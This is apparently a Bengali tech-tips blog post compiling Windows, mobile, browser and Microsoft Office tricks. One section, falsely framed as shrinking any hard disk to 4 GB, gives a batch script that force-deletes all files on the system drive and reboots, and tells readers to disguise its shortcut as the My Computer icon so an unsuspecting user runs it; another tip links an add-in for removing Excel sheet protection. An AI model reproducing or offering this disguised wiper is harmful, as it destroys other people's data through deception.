আসসালামু আলাইকুম

বুধবার, ৯ নভেম্বর, ২০১১

এখন থেকে মোবাইলের ইন্টারনেট কনফিগারেশন নিন ইন্টারনেট থেকে

সবাই কেমন আছেন?
আশা করি সবাই ভালো আছেন।আজ আপনাদের সাথে শেয়ার করবো কিভাবে কোন রকম মেসেজ অথবা কাস্টমার কেয়ার সেন্টারে কল করা ছাড়াই ইন্টারনেট থেকে মোবাইলে ইন্টারনেট সেটিং কনফিগার করা যায়।
প্রথমে যে কোন ইন্টারনেট চালিত কোন মোবাইল অথবা কম্পিউটার থেকে ► এই সাইটে : যান।
তারপর আপনাকে পাচটি ধাপ সম্পূর্ণ করতে হবে।
১ম দুই ধাপে আপনাকে আপনার সেট এর মডেল সিলেক্ট করে দিতে হবে।
৩য় ধাপে আপনাকে আপনার মোবাইল এর নাম্বার দিতে হবে।
৪র্থ ধাপে আপনি কোন অপারেটরের সেটিং চান তা সিলেক্ট করেন।
৫ম ধাপে ক্যাপচা পূরন করে কনফার্ম করুন।
দেখবেন আপনার মোবাইলের অটো ইন্টারনেট সেটিং চলে আসছে।আপনাকে 1234 পিন দিয়ে সেটিং সেভ করতে হবে।
এভাবে আপনি পৃথিবীর যে কোন দেশের মোবাইল অপারেটরের ইন্টারনেট সেটিং নিতে পারবেন।

আপনার windows os–এ মাউস কাজ করবে স্বয়ক্রিয় ভাবে:

Windows OS-এ অনেক সময় দেখা যায় কিছু Dialogue Box আসে যেগুলা আপনার command নিশ্চত করার জন্য ব্যবহত হয়, যেমন ধরেন আপনি একটি ফোল্ডার ডিলেট করবেন তখন আপনি ঐ ফোল্ডারটি Delete করার পরও আপনাকে নিশ্চিতের জন্য আবার জিজ্ঞেস করবে “Do You Want to Delete this Folder/File etc…?” Button- (YES/NO) তখন Windows-এ by default ভাবে সেট করা “Yes” Button–এ আপনার মাউস স্বয়ক্রিয় ভাবে চলে যাবে।

যেভাবে করবেনঃ-
প্রথমে আপনার Windows এর Start মেনু থেকে Control Panel–এ যান তারপর মাউস আইকনটি তে ক্লিক করে প্রবেশ করুন তারপর যে window টি আসবে সেটার তৃতীয় ট্যাব (Pointer Options)–এ ক্লিক করুন, তারপর সেই ট্যাব এর দ্বিতীয় ফ্রেম (Snap To)-এ একটি চেক বক্স (Automatically move pointer to the default button in a dialogue box) সেটি ক্লিক করে চেক করে দিন তারপর Apply, Ok ক্লিক করে বেরিয়ে আসুন।
ব্যস এখন থেকে আপনার মাউস উপরোক্ত দেখানো সকল Dialogue Box-এ স্বয়ক্রিয় ভাবে যেটি সম্ভাব্য সেই বাটনে চলে যাবে।

(সংগৃহিত)

যে কোন সাইজের হার্ড ডিস্ক কে করে দিন মাত্র ৪ জিবি।

কেমন আছেন সবাই? আশা করি ভাল আছেন। আজ আমি আপনাদের কে এক্তা তুনে দিব। মনে হয় অনেকে এইটা জানেন। যারা জানেন না তাদের জন্য আমার এই ক্ষুদ্র চেষ্টা। আজ আমি দেখাব কিভাবে কোন পিসি এর হার্ড ডিস্ক কে কিভাবে ৪ জিবি তে নামিয়ে আনা যায়…। তাহলে চলুন শুরু করি।

প্রথমে Notepad open করুন। এইবার নিচের কোড কপি করে notepad এর মাঝে পেস্ট করুন। পিসি এর যে কোন ড্রাইভে সেভ করুন mahi.bat এই নাম দিয়ে। এবার ফাইল টির একটি shortcut ডেক্সটপে নিয়ে আসুন। shortcut ফাইলটির Icon পরিবর্তন করে My Computer এর Icon দিন এবং আসল My Computer Icon delete করে দেন। বস কাজ শেষ। এইবার যেই My Computer এর মাঝে ডাবল ক্লিক করবে সাথে সাথে তার হার্ড ডিস্ক ৪ জিবি হয়ে যাবে । একদম পার্মানেন্ট।





@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00





এই টিউন দিয়ে কার খতি করবেন না। তাহলে আল্লাহ মাফ করবেন না…

রাইট করা সিডিতে পরে আরও ডাটা যোগ করুন

খুবই ছোট একটি টিপস-এন্ড-ট্রিকস আপনাদের সাথে শেয়ার করছি। যারা জানেন তাদের কে অভিনন্দন । যারা জানেন না তাদের কে আমার পোস্ট এ আমন্ত্রন।
আপনার সিডি/ডিভিডিটা রি-রাইট্যাবল না হলেও সেটিতে পরে আরও ডাটা যোগ করতে পারবেন। এর জন্য Nero সফটওয়্যার দিয়ে সিডি/ডিভিডি রাইট করার সময় সিডি/ডিভিডিতে Data Add করার পর Finished বাটনে ক্লিক করে Next বাটনে ক্লিক করুন। তারপর Allow files to be added later বক্সে টিক চিহ্ন দিয়ে Burn-এ ক্লিক করুন। সিডি/ডিভিডিটা রাইট হবে। পরে আরও ডাটা যোগ করতে চাইলে সিডি/ডিভিডিতে যদি ফাঁকা জায়গা থাকে তাহলে সেই ফাঁকা জায়গাতে একই পদ্ধতিতে আরও ডাটা যোগ করতে পারবেন।

সাইন আউট নাকরে ব্রাউজারে একই ট্যাবে একাধিক মেইল খুলুন

আমাদের অনেকেরই একাধিক মেইল আইডি আছে। এগুলো চেক করার জন্য আমরা বার বার সাইন ইন এবং সাইন আউট করি। ধরুন, আপনার ৫টি ইয়াহু আইডি আছে। এক্ষেত্রে আপনি ৫ বার সাইন ইন এবং ৫ বার সাইন আউট করে থাকেন।

এই ঝামেলা হতে মুক্তি দিতে পারে মজিলা ফায়ারফক্সের WebMail Notifier। এই এডঅনটি আপনার মেইল সম্পর্কে নোটিফিকেশনও করবে। এই লিংক হতে এডঅনটি ইনস্টল করুন। এড করার পর আপনার মজিলা ফায়ারফক্সের ডানপাশে একেবারে নিচে নোটিফায়ারটি দেখতে পাবেন। নোটিফায়ারটির প্রেফারেন্সেস অপশন হতে আপনার আইডিগুলো এড করে নিন।

সহজে ছোটদের কে ইন্টারনেটের অপব্যবহারের হাত থেকে রক্ষা করুন

আসসালামু আলাইকুম, আবারও টিউনার পেজে আপনাদের শুভেচ্ছা জানিয়ে আজকের টিউন শুরু করছি। কেমন আছেন আপনারা? আশা করি অনেক ভাল আছেন সৃষ্টিকর্তার রহমতে। আজ আপনাদের জন্য নিয়ে আসলাম একটি ছোট সফটওয়্যার যার নাম Salfeld Child Control এই সফটওয়্যার দ্বারা আপুনি সহজে আপনার পরিবার এর ছোট সদস্যদের কে ইন্টারনেটের অপব্যবহারের হাত থেকে রক্ষা করতে পারবেন। এটি আপনাকে সাহায্য করবে কম্পিউটার ও ইন্টারনেট অপব্যবহার করার হাত থেকে।



যাদের প্রয়োজন তারা এখান থেকে ডাউনলোড করতে পারেন।

ডাউনলোড লিঙ্ক Salfeld Child Control

এই সফটওয়্যার টির বৈশিষ্ট গুলো হলে

NEW: Blocking of file sharing programs and sites

* NEW: 1,000,000 undesirable sites can now be selected for restriction

* NEW: Adult-content filtering provided by German government authorities

*NEW: Email reports of on- and off-times and daily statistics*NEW: additional configuration options

*Works with all versions of Windows from 95 to Vista

*Limit time on the computer for each day of the week

*Limit use of the Internet for the day and the week

*Set PC off-limits times (e.g. after 11 p.m.)

*Set Internet off-limits times (e.g. after 11 p.m.)

*Easily extend time with passwords or TAN’sDefine “unwelcome” web content using keywords

*Set time limits for categories of websites, such as videos and online games

মনিটরের উলটো পর্দা সোজা করুন চোখের পলকে

সাধারনত গেম খেলার সময় বা ভুল করে একসাথে Ctrl & Alt নিচে ডানে বা বামে যে কোন তীর কী প্রেস করলে মনিটরের Graphics options নরমাল থেকে Rotation হয়ে জাই 90 ,180,270 Degrees তে ।

এ সমস্যার সমাধান করতে মাউস এর right button > Graphics options> Rotation>Normal . অথবা Ctrl & Alt & Up Arrow প্রেস করুন ।এর চেয়ে সহয উপায় আমার জানা নেই ।

দেখুন কিছু xclusive টিপস মাইক্রোসফট অফিসের >> না দেখলে বুঝবেন কী করে?

১. নিয়ে যান এক্সেলের চার্ট খুব সহজেই পাওয়ার পয়েন্টে
প্রেজেন্টেশন তৈরি করতে আমরা সাধারণত মাইক্রোসফট পাওয়ারপয়েন্ট ব্যবহার করি। এই প্রেজেন্টেশনে মাঝে মধ্যে চার্ট প্রয়োজন হয়। পাওয়ারপয়েন্ট থেকে চার্ট তৈরি করা যায়। তবে এক্সেলের ডাটা থেকে চার্ট ব্যবহার করা গেলে তাহলে পরবর্তীতে এক্সেলে পরিবর্তন করলে অটোমেটিক ভাবে পাওয়ারপয়েন্টে হলে ভাল, তাই না? আসুন কীভাবে করা যায় দেখি। এক্সেলে চার্ট তৈরি করুন। এবার উক্ত চার্ট কপি করুন। এবার পাওয়ারপয়েনটের এডিট মেনু থেকে Paste Special ক্লিক করুন। তাহলে একটি ডায়লগ বক্স আসবে। ডায়লগ বক্স থেকে Paste Link এবং Microsoft Office Excel Chart Object নির্বাচন করুন। এবার OK করুন। তাহলেই হবে। এখন থেকে এক্সেলে পরিবর্তন করলে অটোমেটিকভাবে পাওয়ারপয়েন্টেও পরিবর্তন হয়ে যাবে।।

২. ব্যবহার করুন এক্সেলের টেবিল ওয়ার্ডে
মাইক্রোসফট ওয়ার্ড ব্যবহার করা হয় সাধারাণত ছাপার কাজে এবং এক্সেল ব্যবহার করা হয় হিসাবের কাজে। অর্থ্যা, দু’টির কাজই ভিন্ন। তো মাঝেমাঝে এক্সেলের তথ্য ওয়ার্ডের হিসাবের বা টেবিলের জন্য প্রয়োজন হয়। তখন এক্সেলের উক্ত হিসেবের সেল ওয়ার্ডে ব্যবহারের জন্য লিংক ব্যবহার করা যায়। এজন্য, এক্সেলের উক্ত সেলগুলো প্রথমে কপি করুন। এবার ওয়ার্ডে গিয়ে পেষ্ট করুন। পেষ্ট করা তথ্যের সাথে একটি আইকন দেখতে পাবেন। এটির উপর ক্লিক করুন। এখানের মেনু থেকে Keep Source Formatting and Link to Excel অথবা Match Destination Table Style and Link to Excel নির্বাচন করুন। তাহলে এখন থেকে এক্সেলের উক্ত শীটে পরিবর্তন করলে ওয়ার্ডেও পরিবর্তন হবে।।

৩. এক্সেলের ওয়ার্কশীট ডিজেবল করুন
অন্য ব্যবহারকারি যাতে আপনার কোন তথ্য দেখতে না পারে সে আমরা পাসওয়ার্ড দিয়ে থাকি। এখন আপনি চাচ্ছেন পাসওয়ার্ড না দিয়ে কিভাবে দেখানো বন্ধ করা যায়। কোন সমস্যাই না, কীভাবে?? খুব সহজেই আপনি আপনার এক্সেলের ওয়ার্কশীট লুকিয়ে রাখতে পারেন। যে ফাইলটি লুকাতে চান তা খুলুন। এখন এটিকে ডিজেবল বা লুকাতে ভিজ্যুয়াল বেসিক এডিটর লাগবে। ভিজ্যুয়াল বেসিক এডিটরের জন্য Alt+F11 চাপুন, তাহলেই এটি ওপেন হবে। বামপাশের প্যানেলে যে ওয়াকবুর্ক লুকাতে চান তা নির্বাচন করুন। এবার Properties এর Visible থেকে 0-x SheetHidden বা 2 –x SheetVeryHidden নির্বাচন করুন। তাহলে উক্ত ওয়ার্কশীটটি আর দেখা যাবে না।

৪. সহজেই আনপ্রোটেক্ট করুন এক্সেলের ওয়ার্কবুক
মাইক্রোসফট এক্সেলে যারা কাজ করেন তারা নিরাপত্তার খাতিরে ওয়ার্কশীটকে প্রোটেক্ট করে রাখেন। আর এটিকে আনপ্রোটেক্ট করতে হলে পাসওয়ার্ড প্রয়োজন। এখন আপনি যদি পাসওয়ার্ডটি ভুলে যান, তখন??? সমস্যাই না। কীভাবে সমাধান???

http://www.straxx.com/excel/password.xla থেকে Password নামে এড-অন্সটি ডাউনলোড করে ইন্সটল করুন। এবার যে ওয়ার্কশীটকে আনপ্রোটেক্ট করুতে চান তা ওপেন করুন। এবার Tools মেনুতে দু’টি সাবমেনু পাবেন। এখানে ওয়ার্কশীট আনপ্রোটেক্ট করতে Unprotect Sheet এবং ওয়ার্কবুক আনপ্রোটেক্ট করতে Unprotect Workbook এ ক্লিক করুন।।

৫. সহজে ডেসিমেলকে রুপান্তর করুন রোমানে
মাইক্রোসফট এক্সেলে খুব সহজেই আপনি ডেসিমেল সংখ্যাকে রোমানে রূপান্তর করতে পারেন। এজন্য একটি সূত্র ব্যবহার করতে হবে। সূত্রটি হল =ROMAN(number,from). এক্ষেত্রে আপনি সংথ্যা হিসেবে ০-৩৯৯৯ পর্যন্ত ব্যবহার করতে পারবেন। আমরা এথন যদি ৫৭৮ এর রোমান মান বের করতে চাই তাহলে লিখতে হবে =ROMAN(578,0). এখানে from এর পরিবর্তে ০-৪ পযর্ন্ত ব্যবহার করতে পারবেন। ইচ্ছা করলে কোন মান না লিখলেও চলবে। ও আরেকটা কথা, ৩৯৯৯ এর থেকে বেশি ও ঋণাত্মক সংখ্যার মান বের হবে না।।

৬. আনডু বৃদ্ধি করুন এক্সেলের
মানুষের ভুল হওয়া স্বাভাবিক, তাই না? কম্পউটার ভুল করে না, কম্পিউটার ভুল করে কখন, মানুষ ভুল করলে, ঠিক নয় কিখ? কাজে সময় যে কোন কারণ বশতঃ আমাদের ভুল হতেই পারে। এর জন্য আমরা Undo কমান্ড ব্যবহার করি। এক্সেলে আনডু ব্যবহার করা যায় সবোর্চ্চ ১৬ বার। আপনি চাইলে আরো বৃদ্ধি করতে পারেন। এজন্য নোটপ্যাড খুলে নিচের কোডটি কপি করে পেষ্ট করুন। তারপর Excelundo.reg নামে সেভ করুন।

Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Excel\Options]
“UndoHistory”=dword:00000040

এবার এটি চালু করুন। তাহলেই কাজ সেরেছে।।

৭. তথ্য লুকান এক্সেলের
একটু মজা করি কী বলেন? আপনি চাচ্ছেন, আপনি সেলে লিখবেন কিন্তু কোন কিছু যদি না দেখা যায়, তাহলে কী রকম হবে! মজা হবে তাই না। আসুন এবার কাজে, যে সেলের তথ্য লুকাতে চান তা নির্বাচন করুন। এবার Format মেনু থেকে Cell… এ ক্লিক করুন। এখানের Number ট্যাবে যান। Category থেকে Custom নির্বাচন করুন। Type বক্সে লিখুন ;;; (তিনটি সেমিকোলন)। সবশেষে Ok করুন। তাহলেই খেলা শূরু হয়ে যাবে।।



৮. বন্ধ করে দিন এক্সেলের সেল
একটি আগে আমরা মজা করলাম। এবার আরেকটু মজা করি। এমন যদি হয় যে, কিছু সেলে লেখা যায়, কিছু সেলে লেখা যায় না, তাহলে কেমন হয় বলুন তো, মজা না?? মূল বিষয়ে আসি, চলুন তাহলে………..

এক্সেলের কোন ওয়ার্কবুক অন্য কেউ যাতে কোন পরিবর্তন করতে না পারে, সে জন্য আমরা ওয়ার্কবুককে প্রোটেক্ট করে রাখি। এখন আপনি ইচ্ছা করলে একটা পদ্ধতি করতে পারেন। তা হল, যারা দেখবে তারা নির্দিষ্ট কিছু সেল ছাড়া অন্য কোন সেলের তথ্যের পরিবর্তন করতে পারবে না। তার মানে আপনি চাচ্ছেন, অন্যদেরও লেখার অনুমতি থাকা উচিত লেখার জন্য। উক্ত কাজ করতে,

Tools মেনু থেকে Protection এর Allow Users to Edit Ranges এ ক্লিক করুন। এবার New বাটনে ক্লিক করুন। যে যে সেলগুলোর অনুমতি দিবেন সেগুলো নির্বাচন করে Ok করুন। এবার Protect Sheet বাটনে করলে একটি ডায়লগ বক্স আসবে। উপরের দিকে Protect Worksheet and contents of locked cells এবং নিচের দিকে Select locked cells এবং Select unlocked cells চেক করুন। এবার পাসওয়ার্ড দিয়ে Ok, Ok করুন। তাহলেই আসল মজা বুঝবেন।।

৯. অফিস ২০০৭ এর নতুন ব্যবহারকারীদের জন্য
মাইক্রোসফট অফিসের সর্বশেষ সংরক্ষণ হল অফিস ২০০৭। যারা আগে মাইক্রোসফটের পূর্ববর্তী সংরক্ষণগুলো ব্যবহার করছেন, তারা অবশ্য এটিকে দেখলে চিনতেই পারবেন না, যে এটি আপনাদের মাইক্রোসফট অফিস। অফিসের পূববর্তী সংরক্ষণগুলো দেখতে একরকম হলেও এটি একদম পুরো ভিন্ন। যারা এটি ব্যবহার করতে কষ্ট বা বিরক্তবোধ করেন তারা ইউবিটমেনু সফটওয়্যার ব্যবহার করতে পারেন। সফটওয়্যারটি ডাউনলোড করতে এখানে ক্লিক করুন। ইনস্টল করলে দেখবেন Menu নামে একটি ট্যাব এসেছে। এখানে ক্লিক করুন। তাহলেই সব বুঝেবন।।



১০. আসল মজা তো এখানেই
অফিস ২০০৭ কে তো একদম পুরোপুরি পরিবর্তন করা হয়েছে। এর নতুন নতুন ফিচারগুলো আসলেই খুব সুন্দর। অফিস ২০০৭ এর অন্যতম চমক হচ্ছে শব্দ যোগ করা। কি রকম? এ যেমন- কপি, কাট, পেষ্ট, আনডু, রিডু, সেভ ইত্যাদি করার সময় যদি আপনাকে বিভিন্ন শব্দ শোনায় তাহলে আসলেই খুবই মজা হবে। এজন্য আপনাকে একটি এড-অন্স ডাউনলোড করতে হবে। এড-অন্সটি ডাউনলোড করে ইন্সটল করুন। অফিস ২০০৭ খুলুন। এবার Microsoft Office Button থেকে নিচের Word Options এ যান। এখানে Advanced অপশনে যান। নিচের General ট্যাবে Provide feedback with sounds চেক করে Ok করুন। এই পরির্তন একসাথে অন্যান্য প্যাকেজে হয়ে যাবে। মানে হল, এক্সেল, একসিস, পাওয়ারপয়েন্ট, পাবলিশার ইত্যাদি।।

যাক আপনাদেরকে অসংখ্য ধন্যবাদ। কারণ আমার এই অহেতুক টিউনটি পড়ার জন্য। যাক কে কতোটুকু বিরক্ত হয়েছেন তা না বলে কিন্তু যাবেন না।
ধন্যবাদ

Share

Twitter Delicious Facebook Digg Stumbleupon Favorites More